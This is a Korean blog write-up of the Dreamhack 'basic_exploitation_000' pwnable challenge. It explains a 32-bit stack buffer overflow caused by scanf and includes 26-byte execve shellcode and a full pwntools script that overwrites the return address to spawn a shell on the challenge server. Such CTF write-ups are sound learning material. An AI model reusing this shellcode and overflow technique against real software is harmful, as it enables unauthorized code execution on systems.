[dreamhack] basic_exploitation_000 문제풀이

pwnable 초보인 나에게는 어려운 문제였다..

 

원격 서버 환경은 이러하다

Ubuntu 16.04
Arch:     i386-32-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

우선 32bit 환경이기 때문에 스택프레임구조는 buf(n) | sfp(4) | ret(4)  요러하다.

 

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}


int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();

    printf("buf = (%p)\n", buf);
    scanf("%141s", buf);

    return 0;
}

소스코드를 분석해보면 일단 취약점을 하나 발견할 수 있다. 

buf의 크기는 0x80(128 byte)인데 scanf로 141byte 만큼 받을 수 있다는 것..@! 즉 버퍼 오버플로우가 일어날 수 있는 것이다. 

우리는 이 점을 활용해서 buf를 더미값으로 채우고 ret값을 침범하여 원하는 명령을 실행하면 된다. 

 

우리가 더미값으로 채워야 하는 부분은 rbp-0x80 부터 rbp +0x04 즉 0x84 = 132 byte 만큼이다. 

해당 부분은 쉘코드 + 아무문자로 채우면 될 것이다. 

 

사실 쉘코드 초보인지라 기계어 부분은 열심히 구글링해보았다. 

 

scanf 우회 쉘코드 (26byte) --> scanf에 넣을 쉘코드인경우 해당 기계어를 사용하는 것 같다(?) (기본은 쉘코드는 25byte 많이 사용)  

\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80

 

from pwn import *

p = remote('host1.dreamhack.games',22346) # 원격 서버 대상으로 익스플로잇 수행
context.arch = "i386"  # x86 아키텍처

p.recvuntil("buf = (")
buf_addr = int(p.recv(10),16) # 출력된 buf의 위치 저장 

payload = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"
payload += b"\x11" * 106

payload += p32(buf_addr)

p.sendline(payload)
p.interactive()

26 byte를 채우고 남은 132-26 = 106 바이트는 아무값으로 채워주면 된다.

마지막으로 ret에 들어갈 부분은 buf의 시작주소이다. (파일 실행 후 recv를 통해 받은)

이제 프로그램이 ret까지 가면 buf[0]의 위치로 이동해서 셸코드를 실행할 것이다. !!! 

 

성공!!!